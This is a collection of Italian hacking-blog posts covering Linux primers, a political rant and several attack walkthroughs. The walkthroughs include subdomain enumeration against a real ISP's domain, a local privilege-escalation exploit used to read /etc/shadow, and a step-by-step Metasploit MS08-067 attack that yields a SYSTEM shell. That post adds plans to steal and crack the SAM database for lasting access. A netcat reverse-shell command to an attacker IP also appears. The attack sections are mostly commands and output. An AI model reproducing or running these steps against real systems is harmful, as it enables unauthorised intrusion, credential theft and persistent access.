Nella fase di raccolta informazioni, alla ricerca di una “superficie” a cui appigliarsi per poter iniziare un attacco o pianificare una strategia, uno strumento che enumeri i sottodomini del dominio target, può essere uno strumento prezioso.

Gianni Amato ha realizzato knock, che è appunto un tool che effettua un “dictionary attack”, cercando sottodomini provando una lista di nomi noti appartenenti ad un dizionario interno; è possibile fornire anche un dizionario esterno con una quantità maggiore di nomi di sottodominio da testare.  Knock è in grado anche di effettuare il trasferimento di zona.

Knock è uno script realizzato in python che può essere esguito sia su Windows sia su Linux. Per poter effettuare il trasferimento di zona è necessario installare il modulo dnspython.

Di seguito, la mia prova su strada effettuata su Ubuntu 10.04. Inizio con l’installazione opzionale di dnspython:

angelor@xronin:~/Scrivania$ sudo apt-get install python-dnspython

Una volta scaricato knock dal sito http://knock.gianniamato.it/ vado ad eseguirlo. L’obiettivo della scansione è il dominio tin.it.

angelor@xronin:~/Scaricati$ chmod +x ./knock.py
angelor@xronin:~/Scaricati$ ./knock.py
 
angelor@xronin:~/Scaricati$ ./knock.py tin.it
Knock v1.4.2b by Gianni 'guelfoweb' Amato ( http://knock.gianniamato.it )
 
[+] Testing domain
 
www.tin.it             62.211.65.12
 
[+] Dns resolving
 
Domain name               Ip address              Name server
 
tin.it                62.211.65.12           tin.virgilio.it
 
Found 1 host(s) for tin.it
 
[+] Testing wildcard
 
Ok, no wildcard found.
 
[+] Scanning for subdomain on tin.it
[!] Wordlist not specified. I scannig with my internal wordlist...
Estimated time about 604.24 seconds
 
Subdomain                Ip address              Name server
 
broadcast.tin.it          62.211.65.253           videotest.tin.it
cache.tin.it            212.216.172.62             ns1.tin.it
chat.tin.it             195.31.190.197     host197-190-static.31-195-b.business.telecomitalia.it
commerce.tin.it          212.216.174.146         commerce.cs.tin.it
community.tin.it          194.243.155.63          community.tin.it
delta.tin.it           212.216.174.252          tinforma.tin.it
email.tin.it            195.31.190.67      host67-190-static.31-195-b.business.telecomitalia.it
flash.tin.it            62.211.65.251            mmedia.tin.it
ftp.tin.it             194.243.155.68             ftp.tin.it
help.tin.it              62.211.65.14           help.virgilio.it
info.tin.it            212.216.174.119            info.tin.it
irc.tin.it             62.211.73.231             irc3.tin.it
ircd.tin.it             62.211.73.236             ircd.tin.it
localhost.tin.it            127.0.0.1                localhost
loghost.tin.it             127.0.0.1                localhost
mail.tin.it              62.211.72.20             mail.tin.it
mailhost.tin.it            62.211.72.20             mail.tin.it
media.tin.it            62.211.65.252             media.tin.it
monitor.tin.it          212.216.172.106          phobos.cs.tin.it
news.tin.it             62.211.73.198             news.tin.it
ns1.tin.it             212.216.172.62             ns1.tin.it
ns2.tin.it            212.216.172.162             ns2.tin.it
ns3.tin.it            212.216.112.222             ns3.tin.it
ns4.tin.it            212.216.112.112             ns4.tin.it
orion.tin.it            194.243.155.19           ospiti.tin.it
partner.tin.it           194.243.155.17           partner.tin.it
private.tin.it           212.216.182.71           private.tin.it
rd.tin.it               62.211.65.13         tinstage.virgilio.it
smtp.tin.it              62.211.72.32             smtp.tin.it
vc.tin.it             212.216.174.140             vc.tin.it
wap.tin.it            212.216.174.194             wap.tin.it
webmail.tin.it            62.211.65.12           tin.virgilio.it
www.tin.it              62.211.65.12           tin.virgilio.it
www3.tin.it             194.243.155.8             www3.tin.it
 
Found 34 subdomain(s) in 34 host(s) in 738.48 second(s)

Questo è l’esito della ricerca. Pare non ci sia nulla di clamoroso, però sono emersi alcuni host potenzialmente interessanti (che è orion.tin.it? e vc.tin.it?).  L’obiettivo finale è quello di trovare host di test, nascosti, o qualsiasi cosa possa contenere delle vulnerabilità, o possa fornire un appiglio come punto di partenza per poter stabilire una testa di ponte da cui sferrare l’attacco.

Non è il caso di questo esempio, ma in alcune occasioni (più frequenti di quello che si pensi), possono emergere anche indirizzi ip utilizzati nella rete interna.

Insomma, un altro buon tool di Gianni Amato, tool utile nella fase di raccolta informazioni di un penetration test.

Segnala presso:

L’Ubuntu Security Notice 959-1 pubblicata il 7 Luglio  rende nota l’esistenza di un bug che consente ad un utente normale di elevare i propri privilegi a livello di root, permettendogli di accedere a risorse altrimenti non accessibili.

Questo bug (scoperto da Denies Excoffier), di cui esiste già una patch e che appartiene alla categoria  “local privilege escalation”, si annida nel modulo PAM MOTD di Ubuntu. I programmatori hanno commesso un errore nella gestione dei permessi durante la creazione di un file da parte dell’utente.

L’esistenza di un exploit (disponibile su SecurityFocus) in questa occasione non è fondamentale, anche se semplifica ulteriormente la procedura di sfruttamento di questa vulnerabilità. Infatti il cuore di questo exploit è la creazione di un link simbolico tra una directory nella home dell’utente e la risorsa proibita a cui si vuole accedere.

Per essere più chiari: con questo bug un qualsiasi “utente semplice” che abbia le credenziali di accesso al sistema, può scalare  i privilegi e catturare il file contenente gli hash delle password (/etc/shadow), normalmente non accessibile.

Di seguito mostro passo-passo l’esecuzione di questa operazione che ho svolto sul mio Ubuntu Server 9.10:

Eccomi loggato in Ubuntu Server 9.10:

angelor@ubuntu:~$  uname -a
Linux  ubuntu 2.6.31-14-generic #48-Ubuntu SMP Fri Oct 16 14:04:26 UTC 2009  i686 GNU/Linux

Intanto vetifico i permessi del file degli hash delle password:

angelor@ubuntu:~$ ls  -l /etc/shadow
-rw-r----- 1 root shadow 926 2010-05-02 21:19 /etc/shadow

correttamente appartengono a root;  quindi verifico se posso accedere al file /etc/shadow, il file degli hash delle password:

angelor@ubuntu:~$ cat  /etc/shadow
cat:  /etc/shadow: Permission denied

come previsto l’accesso è negato.
Ora eseguo l’exploit che ho scaricato da SecurityFocus:

angelor@ubuntu:~$ ./41465.sh /etc/shadow

per verificare la riuscita dell’exploit chiudo la shell ed effettuo un nuovo login.
Una  volta rientrato verifico di nuovo i pernessi del file /etc/shadow:

angelor@ubuntu:~$ ls  -al /etc/shadow
-rw-r----- 1 angelor angelor 926 2010-05-02 21:19 /etc/shadow

Questa volta il file appartiene a me! Quindi posso visualizzarlo:

angelor@ubuntu:~$ cat  /etc/shadow
root:xxxxxxxxxxxxxxxxxxxxxxxxxxx:14731:0:99999:7:::
daemon:*:14731:0:99999:7:::
bin:*:14731:0:99999:7:::
sys:*:14731:0:99999:7:::
sync:*:14731:0:99999:7:::
games:*:14731:0:99999:7:::
man:*:14731:0:99999:7:::
lp:*:14731:0:99999:7:::
mail:*:14731:0:99999:7:::
news:*:14731:0:99999:7:::
uucp:*:14731:0:99999:7:::
proxy:*:14731:0:99999:7:::
www-data:*:14731:0:99999:7:::
backup:*:14731:0:99999:7:::
list:*:14731:0:99999:7:::
irc:*:14731:0:99999:7:::
gnats:*:14731:0:99999:7:::
nobody:*:14731:0:99999:7:::
libuuid:!:14731:0:99999:7:::
syslog:*:14731:0:99999:7:::
mysql:!:14731:0:99999:7:::
landscape:*:14731:0:99999:7:::
postfix:*:14731:0:99999:7:::
dovecot:*:14731:0:99999:7:::
sshd:*:14731:0:99999:7:::
tomcat6:*:14731:0:99999:7:::
angelor:xxxxxxxxxxxxxxxxxxxxxxxxxxx:14731:0:99999:7:::
angelor@ubuntu:~$

Ho letto il file delle password senza essere root: questo è il significato di privilege escalation. A questo punto non mi resta che tentare di craccare le password. ma questa è un’altra storia e la racconterò un’altra volta.

Questa vulnerabilità colpisce tutte le piattaforme di Ubuntu 9.10 e Ubuntu 10.04. E’ già disponibile la patch, basta effettuare un aggiornamento dal menù di sistema.

Segnala presso:

Il penetration tester è un hacker vero e proprio che, però, svolge il suo lavoro alla luce del sole e nella legalità più completa (guadagnando anche dei soldi per il suo operato). Ma, come si svolge in pratica un “pen test” (come si dice volgarmente)?

Tutto viene spiegato in questo articolo completamente in italiano scritto dal team di backtrack Italia in particolare dal mitico brigante: Milw0rm Exploits Archive.

In questo articolo viene spiegato come si aggiorna l’archivio degli exploit, come si sfruttano le vulnerabilità usando Nmap (di cui abbiamo parlato estesamente) e di come si modifica un exploit per creare un’attacco ad hoc. Sicuramente una lettura molto interessante per capire i segreti più reconditi di un attacco hacker.

L’articolo utilizza, ovviamente, di come sistema operativo di partenza linux, quindi per gli utenti windows potrebbe essere una lettura un po’ più “difficile” vale comunque la pena di leggerlo e, se avete qualche domanda noi siamo qui per rispondere.

Segnala presso:

Innanzi tutto dobbiamo capire che cosa si intende per GNU/Linux:
GNU = è il sistema operativo vero e proprio lanciato per la prima volta nel 1983 dal Richard Stallman. La particolarità di questi sistemi operativi è che sono esclusivamente free.
Linux = è il kernel progettato da Linux Torvalds che permette al sistema operativo di funzionare dovutamente.

Da queste definizioni abbiamo capito il primo capostaldo. Il kernel è sempre lo stesso ma cambiano i sistemi operativi in cui possiamo andare a lavorare. Tutti ricorrono comunemente sotto il nome di Linux ma ci sono delle differenze sostanziali che vale la pena di esaminare.

Prima però dobbiamo rispondere a una domanda che forse qualcuno si sta ponendo: Quante distribuzioni esistono?
Molti di voi staranno pensando: tantissime! In effetti questa risposta è esatta ma solo in parte. E’ vero che esistono moltissime distribuzioni ma è anche vero che derivano tutte da tre principali: Slackware, Red Hat e Debian.
Questo ci porta alla prima sostanziale differenza tra le varie versioni di linux: i pacchetti di installazione.

Ognuna di queste distribuzioni ha un metodo di installazione (e dei file di installazione) differenti che ha trasmesso a tutte le versioni “figlie”. Analizziamole una per una.

Installazione con file RPM: l’acrostico RPM non vuol dire altro che RedHat Packet Manager si capisce subito chi è l’ideatore di questo metodo di installazione. Ne usufruiscono distribuzioni come Fedora e Mandriva, per citare le più comuni. Utilizzano i file RPM anche alcune distribuzioni che derivano da Slackware come per esempio SuSE, questo sta ad indicare come le divisioni non siano così nette e la discendenza da una distribuzione non esclude per forza l’implemetazione di alcune caratteristiche delle altre.

Installazioni con file tar: viene utilizzata principalmente da Slackware e dalle sue derivate. I file, nella maggioranza dei casi vengono scaricati con estenzione .tar.gz o .tgz nel caso siano stati compressi con gzip (che è l’estensione più comune),.tar.bz2 o .tbz2 o .tbz nel caso siano stati compressi con bzip2 o ancora .tar.Z nel caso siano stati compressi con compress.

Installazione con file .deb: come si capisce chiaramente dall’estensione questi tipi di file sono utilizzati dalla famiglia di Debian di cui fanno parte distribuzioni come Ubuntu (che sicuramente è la più diffusa), Freespire e Knoppix. Doveroso precisare che Debian è la distribuzione preferita dagli hackers.

Dopo aver visto quali sono i differenti tipi di file di installazione è doveroso fare una precisazione. Come avete potuto notare leggendo quanto sopra non sono mai state dette frasi come: “Questo è meglio di questo” o “Quello è meglio dell’altro”. Lo scopo di questo articolo è quello di chiarire le idee sul mare di informazioni che possiamo trovare su linux, non vuole consigliare nessuna distribuzione in particolare, anche perchè è mia convinzione personale che per scegliere la giusta distro (così le chiamano nel web) bisogna provare almeno i capostipiti, cioè i tre citati sopra o una delle derivate, in modo da vedere quella che si adatta di più al nostro gusto e alle nostre conoscenze.

Detto questo andiamo a considerare un’altra grande differenza tra le
distro: il motore grafico.

GNOME = GNU Network Object Model Environment è stato il primo vero e proprio motore grafico su GNU/Linux. Molti anni di esperienza garantiscono affidabilità e semplicità.

KDE = K Desktop Environment è sicuramente il più “bello”. Con i suoi numerosi fronzoli grafici non ha nulla da invidiare ad ambienti desktop a pagamento come Windows o Mac.

Xfce = Adatto a computer con prestazione non altissime, il massimo come rapporto tra qualità e consumo di risorse.

Enlightenment = Motore grafico non comunissimo ma che non ha nulla da invidiare agli altri tre.

Ho fatto solo una breve carrellata perchè non volevo scendere in particolari che avrebbero reso pesante questa trattazione. Comunque volevo fare due precisazioni. I due motori grafici più comuni sono Gnome e KDE e sono quelli che vengono usati da quasi tutte le distribuzioni più diffuse. Per esempio SuSE, Kubuntu, Mandriva usano KDE, Ubuntu invece usa Gnome. Il motore grafico in se non ha molto a che fare con la distribuzione quindi alla fine scegliete quello che vi piace di più. Per esempio se andate nel sito di ubuntu scoprirete che si può scaricare anche con altri motori grafici. Esiste kubuntu con KDE, xubuntu con Xfce ed Ebuntu con Enlightenment. Come vi dicevo è solo una questione di gusti.

Ora avete un’infarinatura globale del mondo GNU/Linux come ho già detto questo articolo non pretende di darvi TUTTE le spiegazioni, anche perchè i più esperti troveranno delle piccole imprecisioni dovute al fatto che ho voluto semplificare al massimo. Comunque per rendere questo articolo ancora più utile potete commentare tutto ciò che io non ho detto (e anche correggere quello che ho detto) e spiegarlo in parole semplici in questo modo tutti gli aspiranti hackers lettori di PH potranno buttarsi nel mondo del pinguino e slegarsi dal software a pagamento.

Questo articolo è stato scritto da Daniele Chiuri alias ilchiuri autore di Fantasmi della rete

Segnala presso:

Teniamo conto del fatto che questo sistema potrebbe essere usato anche da un malintenzionato che vuole rubarci i dati quindi prendiamo le nostre precauzioni.

Per risolvere il problema sopra citato dobbiamo possedere una distribuzione live di linux. Sul web se ne trovano molte da scaricare gratuitamente citiamo giusto le più famose come Ubuntu, SuSE e Gentoo.

Prima di parlare del metodo in se stesso facciamo una breve digressione sul significato della parola LIVE. Come molti di noi sapranno i sistemi operativi linux sono gratuiti e scaricabili liberamente. Quasi tutte le aziende che producono questi sistemi operativi creano anche delle versioni che partono direttamente da cd che vengono chiamate appunto live. Questi sistemi operativi non copiano nessun dato sul nostro hard disk ma partono semplicemente inserendo il disco all’interno dello slot al momento dell’avvio. Una volta che il sistema è partito basta riavviare (togliendo ovviamente il cd dall’alloggiamento) per ritornare senza danni al nostro sistema originale.

Detto questo passiamo al metodo in se stesso. Inseriamo il cd della live che abbiamo scelto (se siamo neofiti consiglio Ubuntu, Kubuntu o SuSE). Dopo qualche minuto di caricamento apparirà il desktop di linux (che non differisce di molto da quello di windows) ora basterà andare a cercare il pannello “Risorse del computer” che per esempio nel caso di SuSE si chiama Dauphin e da lì andiamo a cercare il nostro hard disk. Una volta trovato (non vi preoccupate è più facile a farsi che a dirsi) possiamo masterizzare tutto su un dvd oppure usare un supporto esterno per salvare i nostri file.

Con questo metodo riusciamo a recuperare tutti i nostri dati anche se Windows è irreparabilmente corrotto.

Come detto sopra questo metodo potrebbe essere usato per rubare dati da un computer del quale non possediamo la password di accesso.
Come possiamo proteggerci? Un modo potrebbe essere quello di impostare una password direttamente dal bios al posto della solita password di windows. In questo andremo a proteggere tutto il computer e non solo l’account del nostro sistema operativo e renderemo questo metodo, e anche quello descritto qualche giorno fa basato sull’account Administrator, inefficace. Ovviamente questo non è un metodo sicuro al 100% in quanto avendo un accesso fisico al pc si può annullare la password del bios resettando lo stesso (in pratica togliendo e rimettendo la batteria della scheda madre). Quindi in conclusione è meglio se facciamo molta attenzione a chi si avvicina al nostro computer.

Questo articolo è stato scritto da Daniele Chiuri alias ilchiuri autore del libro Fantasmi della rete

Segnala presso:

Ci sono molti pareri contrastanti riguardo a queste domande e qui non si vogliono dare giudizi nè su uno nè sull’altro, voglio solo dirvi quali sono i pundi di forza del pinguino visti dal punto di vista di un hacker.

1 – Sicurezza. Tutte le distribuzioni non vengono infettate da virus. Questo perchè ce ne sono pochissimi compatibili in circolazione.

2 – Flessibilità. In base alle nostre esigenze possiamo decidere di avere un sistema operativo basato su una shell di comando e basta oppure tutti i fronzoli di un motore grafico che non ha nulla da invidiare all’ultimissimo windows 7.

3 – Strumenti. Per la vita di un hacker sono indispensabili programmi come netcat e nmap che su linux sono già disponibili e pronti per l’uso.

4 – Prezzo. Come sappiamo tutte (o quasi) le distribuzioni di linux sono gratuite: a partire dall’essenziale ma potente debian fino ad arrivare alla grafica di kubuntu.

5 – Etica. Il comportamento delle multinazionali non ci è mai stato simpatico e mamma Microsoft fa parte di queste. Monopolio è un aggettivo che si associa spesso alla casa di zio Bill.

6 – Personalizzazione. Come sappiamo la licenza GNU/GPL ci permette di modificare a nostro uso e consumo il sistema operativo per creare, per chi ne ha le capacità, un programma ad hoc.

7 – Semplicità. Linux difficile? Retaggio del passato. Chiunque usi windows può passare senza problemi a distribuzioni semplici come kubuntu, SuSE, mandriva ecc. Dopo poco tempo di utilizzo si potrà passare a qualcosa di più complesso.

8 – Software. Chi dice che non ci sono programmi per linux si sbaglia. Quasi tutti i software per windows hanno una loro versione per linux e quelli che non ce l’hanno…si possono sempre far partire con qualche emulatore.

9 – Compatibilità. Avete un computer un po’ datato? Non importa troverete la soluzione con un sistema operativo moderno ma adatto alle vostre prestazioni. Senza dover usare programmi creati dieci anni fa.

10 – Devo dirvi anche un decimo motivo?

Questo articolo è stato scritto da Daniele Chiuri alias ilchiuri autore del libro Fantasmi della rete

Segnala presso:

Sono già disponibili online divesi exploit in grado di sfruttare questa vulnerabilità. Quale può essere l’impatto di questo bug? Il fatto che si tratti di un attacco locale, non direttamente sfruttabile da remoto, non deve trarre in inganno, si tratta di un problema grave.

Intanto perchè qualsiasi utente, anche con privilegi minimi, sfruttando questo bug può diventare “root” (super-utente) ed ottenere il controllo totale del sistema. Inoltre un attacco locale può essere anche sferrato in seguito ad un attacco remoto. Questo significa che attaccando un banale bug di una applicazione web come un forum o un cms, l’hacker può ottenere l’accesso al sistema, seppur con privilegi bassi; ma sfruttando il bug nel kernel di Linux i “super-poteri” sono assicuarti;   dilagare prima nel sistema e poi eventualmente nell’intero network sarà un gioco da ragazzi.

Uno scenario particolarmente realistico è quello del mass-defacement. Chi offre servizi di hosting, in particolare lo shared-hosting, dove diversi siti risiedono su di una stessa macchina, soffrirà in modo particolare di questo problema. Basterà un Joomla non patchato per consegnare tutti i siti ospitati sulla macchina vulnerabile ai pirati.

Per concludere voglio segnalare che qualche mese fa Microsoft sistemò un bug di Windows vecchio di 7 anni: questo bug di Linux è vecchio di 8 anni. In questo caso Microsoft non ha il monopolio.

Segnala presso:

Una cosa però veramente ridicola è l’obamismo, l’atteggiamento isterico che ha pervaso l’opinione pubblica mondiale (e italiana), autentica mania di massa, misura dell’irrazionalità e della capacità propagandistica dei media.

Un esempio di questo obamismo è l’articolo Obama Apre all’Open Source, Brunetta firma un accordo con Microsoft apparso su Geekissimo. In realtà una non-notizia. La presunta apertura di Obama all’open source (attenzione, non a Linux):

“Secondo quanto riportato dalla BBC, infatti, tra una telefonata ai leader mediorientali ed un’occhiata alla crisi globale, il neo-presidente a stelle e strisce ha trovato il tempo di affidare a Scott McNealy, co-fondatore di Sun Microsystems, la stesura di un progetto relativo all’adozione dei software open source nella pubblica amministrazione“

Quindi la fonte sarebbe la BBC, si parlerebbe genericamente di open-source nel contesto di un fumoso progetto. Poco più che un gossip. Però è Obama e quindi è come se ormai gli USA utilizzassero Linux ovunque.

Dall’altra parte si parlava di un accordo siglato tra Brunetta e Microsoft, non una cosa fumosa ma nero su bianco, per digitalizzare le strutture pubbliche a costo zero! Però lo ha fatto Brunetta ed essendo il ministro italiano si tratta comunque di una porcheria! I cattivi frutti dell’anti-politica e  un po’ di banalità.

Torniamo ad Obama per introdurre un nuovo attore in questa commedia del rapporto tra open-source e Stati. Come dicevo ho molti dubbi sul nuovo presidente americano. Però potrebbe sorprendermi, ribellarsi ai mariuoli che ha intorno e che lo hanno messo lì e diventare veramente un buon presidente. Un precedente esiste: è il caso di Vladimir Putin.

L’ex presidente russo (attuale primo ministro) fu portato al Cremlino da una cricca delinquenziale per garantire la continuità dell’amministrazione mafiosa di Eltsin , l’epoca degli oligarchi filo-occidentali impegnati a derubare la Russia delle proprie risorse per metterle nelle mani della finanza internazionale, ovvero quelli che hanno provocato la catastrofe finanziaria.

Ebbene Putin, evidentemente supportato da una potente lobby che per anni era rimasta nell’ombra, dormiente in attesa di tempi migliori, lobby basata sullo scheletro dell’ex KGB, è riuscito nel giro di pochi anni ad affrancare la Russia dalle ruberie dell’imperialismo anglo-americano. Se c’è riuscito Putin ce la potrebbe fare anche Obama.

L’azione di Putin e il progressivo affrancamento russo dalla pressione imperialista anglo-americana ha avuto naturalmente la conseguenza di una campagna mediatica, militare ed economica aggressiva verso la nuova leadership russa. Nella visione manichea della realtà-Matrix creata dai media filo-occidentali, Putin diventa un potenziale “nuovo Hitler” di turno.

Forse anche per questo motivo alcune notizie dalla potenza eurasiatica passano in secondo piano. Per esempio la Russia avrebbe intenzione di creare un “sistema operativo nazionale” per sostituire Windows. La proposta verrà presentata prossimamente alla Duma, il parlamento russo.
Il sistema operativo nazionale dovrebbe essere basato su GNU/Linux.

Questa è una notizia più concreta rispetto al vago e fantomatico progetto obamiano. Se la scelta di Mosca verso l’adozione di un sistema operativo nazionale alternativo alla dittatura microsoftiana (e quindi americana) dovesse andare a buon fine, rappresenterebbe un passo importantissimo verso una dipendenza meno marcata dagli USA, sarebbe un esempio che l’Italia e l’Europa dovrebbero seguire, magari in collaborazione con la potenza dell’Est.

Staremo a vedere chi vincerà la guerra fredda dell’open-source.

Segnala presso:

Perchè l’attacco abbia successo si devono presentare le seguenti condizioni:

• Il computer non deve essere patchato contro la vulnerabilità MS08-067
• Il computer deve permettere connessioni in entrata sulla porta 445

Se queste due condizioni non sono presenti il sistema si può considerare sicuro. Per essere sicuri di essere invulnerabili a questo attacco installare la patch MS08-067; in alternativa inibire l’accesso alla porta 445 tramite firewall.

L’attacco viene portato utilizzando il Metasploit Framework, versione 3.3-dev. Come piattaforma ho utilizzato Back|Track3, una distribuzione Linux appositamente studiata per i penetration test.

Aggiornare Metasploit

Nella versione BT3 appena masterizzata l’exploit che voglio usare non c’è, quindi bisogna aggiornare Metasploit Framework tramite subversion, con il comando:

svn update

da eseguire nella directory dove si trova il Framework 3 di Metasploit.

Preparazione dell’attacco

Con il comando ifconfig mi sincero del mio indirizzo ip:

bt framework3 # ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0C:29:AC:13:6D
inet addr:192.168.132.129  Bcast:192.168.132.255  Mask:255.255.255.0
UP BROADCAST NOTRAILERS RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:5909 errors:0 dropped:0 overruns:0 frame:0
TX packets:5390 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:8686599 (8.2 MiB)  TX bytes:322667 (315.1 KiB)
Interrupt:18 Base address:0x1080

Come si vede il mio indirizzo è 192.168.132.129. La macchina target, quella che andrò ad attaccare è un Windows XP Pro vulnerabile a questo attacco e con la porta 445 accessibile. Il suo indirizzo è 192.168.132.128. Entrambe le macchine sono virtuali, emulate su VMWare.

Metasploit Framework dispone di diverse interfacce: quella che prediligo è msfconsole, ed è quella che utilizzerò in questo tutorial. Per accedere a msfconsole basta digitare il comando sulla linea di comando per entrare nel prompt msf:

bt framework3 # msfconsole
 
=[ msf v3.3-dev
+ -- --=[ 294 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 58 aux

Per visualizzare la lista degli exploit disponibili uso il comando show exploits; di seguito mostro uno stralcio, dove viene visualizzato quello che mi interessa:
msf > show exploits

Exploits
========
 
Name                                                      Description
----                                                      -----------
 
windows/smb/ms06_066_nwwks                                Microsoft Services MS06-066 nwwks.dll
<strong>windows/smb/ms08_067_netapi                               Microsoft Server Service Relative Path Stack Corruption</strong>
windows/smb/msdns_zonename                                Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
windows/smb/psexec                                        Microsoft Windows Authenticated User Code Execution

Ho trovato l’exploit: decido di impiegarlo:

msf > use windows/smb/ms08_067_netapi

visualizzo la lista delle opzioni:

msf exploit(ms08_067_netapi) > show options
 
Module options:
 
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
 
Exploit target:
 
Id  Name
--  ----
0   Automatic Targeting

Ci sono tre parametri obbligatori: RHOST (l’indirizzo del target), la porta Tcp (445) e il servizio da sfruttare come vettore (BROWSER); lascio gli ultimi due di default e inserisco l’Ip del computer che voglio attaccare:

msf exploit(ms08_067_netapi) > set RHOST 192.168.132.128
RHOST => 192.168.132.128

Il target non va specificato, in quanto viene selezionato automaticamente (Automatic Targeting)

Ora devo decidere cosa fare se l’exploit va a buon fine. Metasploit mette a disposizione diversi payloads, ovvero diverse opzioni dalla semplice shell su porta Tcp, alla connessione inversa, al server VNC. In questo caso scelgo la shell su port Tcp, scelta classica:

msf exploit(ms08_067_netapi) > show payloads
 
Compatible payloads
===================
 
Name                                            Description
----                                            -----------
generic/debug_trap                              Generic x86 Debug Trap
generic/debug_trap/bind_ipv6_tcp                Generic x86 Debug Trap, Bind TCP Stager (IPv6)
 
...
 
windows/shell/bind_tcp                          Windows Command Shell, Bind TCP Stager
windows/shell/reverse_ipv6_tcp                  Windows Command Shell, Reverse TCP Stager (IPv6)
 
...
 
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp

Ecco fatto: l’exploit è configurato. Ho scelto l’exploit ms08_067 che colpisce Windows senza l’aggiornamento relativo; ho settato l’indirizzo del target da attaccare ovvero RHOST 192.168.132.128; infine ho scelto il payload bind_tcp: se l’exploit andrà a buon fine potrò collegarmi (lo farà automaticamente) con una shell Windows su una porta Tcp  della macchina remota. Decido di non cambiare la porta Tcp e lasciare il valore di default: 4444.

A questo punto non resta che lanciare l’attacco, con il comando exploit:

msf exploit(ms08_067_netapi) > exploit
 
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:Italian
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.132.129:55761 -> 192.168.132.128:4444)
 
Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
 
C:\WINDOWS\system32>ipconfig
ipconfig
 
Configurazione IP di Windows
 
Scheda Ethernet Connessione alla rete locale (LAN):
 
Suffisso DNS specifico per connessione: localdomain
Indirizzo IP. . . . . . . . . . . . . : 192.168.132.128
Subnet mask . . . . . . . . . . . . . : 255.255.255.0
Gateway predefinito . . . . . . . . . : 192.168.132.2

Come si vede l’attacco è andato a segno. Tramite la vulnerabilità Metasploit ha inviato un payload con una shellcode in grado di aprire la porta Tcp 4444 sulla macchina Windows e mi ha permesso di collegarmi ad una shell dei comandi.
Quindi mi sono torvato un prompt dei comandi Windows sotto le mani! Ho eseguito ipconfig per mostrare l’Ip, che effettiavamente è quello della macchina che volevo attaccare.

A questo punto ho l’accesso completo con privilegi SYSTEM. Posso fare qualsiasi cosa.
Ho avuto l’accesso completo senza dover conoscere nessuna password. Ora posso prelevare il SAM database e craccarlo comodamente per poter rientrare in seguito con l’account di amministratore, senza dover rifare l’attacco: se il bug verrà patchato avrò comunque l’accesso garantito.

Segnala presso:

In questo caso per poter prendere il controllo del sistema si può utilizzare un back-channel. Il back-channel è un canale che parte dalla macchina remota e termina sul nostro computer.Con un back-channel sarà l’host sotto attacco a collegarsi a noi, e sul nostro computer apparirà la shell del computer remoto.

Per spiegare come fare a utilizzare netcat come back-channel mostro un esempio sfruttando due computer: il computer dell’hacker su cui gira Windows XP, e la quello della vittima su cui invece è installato Linux Ubuntu.

La macchina dell’attacker ha l’indirizzo Ip 192.168.132.1, la vittima 192.168.132.130.

Per prima cosa apro il prompt dei comandi e metto netcat in ascolto sulla porta 9999:

C:\Documents and Settings\angelor>nc -l -p 9999 -vv

l’opzione -l mette netcat in ascolto, il parametro -p specifica la porta Tcp.

Sull’altro computer su cui come ho detto gira Linux Ubuntu, digito il seguente comando:

angelor@daikengo:~$ nc 192.168.132.1 9999 -e /bin/sh -vv

nei parametri viene specificato l’Ip del computer dell’attacker (192.168.132.1) e la porta; con l’opzione -e si esegue la shell di sistema /bin/sh. Però l’output verrà indirizzato sul canale aperto Tcp aperto con l’altro computer e non in locale:

(UNKNOWN) [192.168.132.1] 9999 (?) open

questo messaggio indica che il computer dell’hacker ha accettato la connessione. Dall’altra parte, sul computer dell’hacker:

192.168.132.130: inverse host lookup failed: h_errno 11004: NO_DATA

connect to [192.168.132.1] from (UNKNOWN) [192.168.132.130] 36156: NO_DATA

questo indica che il computer remoto (Ubuntu, 192.168.132.130) ha aperto una connessione verso questo computer. A questo punto non rimane che digitare comandi: comandi Linux naturalmente!

wUSER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
angelor  pts/0    :0.0             22:15   23.00s  0.32s  0.00s sh

uname -a
Linux daikengo 2.6.24-19-generic #1 SMP Wed Jun 18 22:43:41 UTC 2008 i686 GNU/Linux

ls / -al
drwxr-xr-x  21 root root  4096 2008-08-24 17:52 .
drwxr-xr-x  21 root root  4096 2008-08-24 17:52 ..
drwxr-xr-x   2 root root  4096 2008-08-24 17:53 bin
drwxr-xr-x   3 root root  4096 2008-08-24 17:52 boot
lrwxrwxrwx   1 root root    11 2008-08-24 17:43 cdrom -> media/cdrom
drwxr-xr-x  10 root root 13700 2008-11-25 10:14 dev
drwxr-xr-x 120 root root  4096 2008-11-25 10:15 etc
drwxr-xr-x   3 root root  4096 2008-08-24 17:48 home
drwxr-xr-x   2 root root  4096 2008-07-02 12:16 initrd
lrwxrwxrwx   1 root root    33 2008-08-24 17:52 initrd.img -> boot/initrd.img-2.6.24-19-generic
drwxr-xr-x  16 root root  4096 2008-08-24 17:53 lib
drwx------   2 root root 16384 2008-08-24 17:43 lost+found
drwxr-xr-x   4 root root  4096 2008-07-02 12:16 media
drwxr-xr-x   2 root root  4096 2008-04-15 07:53 mnt
drwxr-xr-x   2 root root  4096 2008-07-02 12:16 opt
dr-xr-xr-x 116 root root     0 2008-11-25 10:13 proc
drwxr-xr-x   3 root root  4096 2008-08-24 17:52 root
drwxr-xr-x   2 root root  4096 2008-08-24 17:53 sbin
drwxr-xr-x   2 root root  4096 2008-07-02 12:16 srv
drwxr-xr-x  12 root root     0 2008-11-25 10:13 sys
drwxrwxrwt  13 root root  4096 2008-11-25 10:19 tmp
drwxr-xr-x  11 root root  4096 2008-07-02 12:18 usr
drwxr-xr-x  15 root root  4096 2008-07-02 12:34 var
